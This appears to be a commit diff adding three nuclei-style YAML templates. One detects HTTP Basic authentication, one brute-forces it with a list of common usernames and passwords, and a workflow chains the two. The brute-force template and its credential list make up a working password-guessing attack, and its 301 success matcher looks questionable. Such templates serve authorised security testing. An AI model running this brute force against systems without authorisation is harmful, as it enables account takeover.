Adding basic auth detection / bruteforce / workflows
parent
5d3c429763
commit
1c4c6982d5
|
@ -0,0 +1,95 @@
|
|||
id: basic-auth-bruteforce
|
||||
|
||||
info:
|
||||
name: Basic Auth Bruteforce
|
||||
author: "@w4cky_"
|
||||
severity: high
|
||||
|
||||
requests:
|
||||
|
||||
- payloads:
|
||||
username:
|
||||
- admin
|
||||
- manager
|
||||
- administrator
|
||||
- username
|
||||
- login
|
||||
- anonymous
|
||||
- test
|
||||
- guest
|
||||
- root
|
||||
- demo
|
||||
|
||||
password:
|
||||
- admin
|
||||
- pass1
|
||||
- pass1
|
||||
- root
|
||||
- welcome
|
||||
- p@ssw0rd
|
||||
- user
|
||||
- test
|
||||
- testest
|
||||
- dupa8
|
||||
- admin123
|
||||
- admin1234
|
||||
- admin12345
|
||||
- anonymous
|
||||
- manager
|
||||
- linux
|
||||
- system
|
||||
- oracle
|
||||
- administrator
|
||||
- 11111111
|
||||
- qwerty123
|
||||
- cisco123
|
||||
- admin123456
|
||||
- 1qazXSW@
|
||||
- master
|
||||
- 123qweasd
|
||||
- 1qaz2wsx
|
||||
- 123456789
|
||||
- 1234567890
|
||||
- !qaz@wsx
|
||||
- !q@w
|
||||
- wubao
|
||||
- pa55w0rd
|
||||
- 123abc
|
||||
- 123456
|
||||
- 123456789
|
||||
- qwerty
|
||||
- password
|
||||
- 1111111
|
||||
- 12345678
|
||||
- abc123
|
||||
- 1234567
|
||||
- password1
|
||||
- 12345
|
||||
- 1234567890
|
||||
- 123123
|
||||
- 000000
|
||||
- Iloveyou
|
||||
- 1234
|
||||
- 1q2w3e4r5t
|
||||
- Qwertyuiop
|
||||
- 123
|
||||
- Monkey
|
||||
- Dragon
|
||||
- demo
|
||||
|
||||
attack: clusterbomb
|
||||
|
||||
raw:
|
||||
- |
|
||||
GET /protected HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Authorization: Basic {{base64('username:password')}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
Connection: close
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 301
|
|
@ -0,0 +1,22 @@
|
|||
id: basic-auth-detection
|
||||
|
||||
info:
|
||||
name: Basic auth detection
|
||||
author: "@w4cky_"
|
||||
severity: info
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 401
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "Www-Authenticate:"
|
||||
part: header
|
|
@ -0,0 +1,17 @@
|
|||
id: basic-auth-workflow
|
||||
|
||||
info:
|
||||
name: Basic auth detection and bruteforce workflow
|
||||
author: "@w4cky_"
|
||||
|
||||
variables:
|
||||
basic_auth_detect: technologies/basic-auth-detection.yaml
|
||||
basic_auth_bruteforce: fuzzing/basic-auth-bruteforce.yaml
|
||||
|
||||
logic:
|
||||
|
|
||||
|
||||
if basic_auth_detect() {
|
||||
|
||||
basic_auth_bruteforce()
|
||||
}
|
Loading…
Reference in New Issue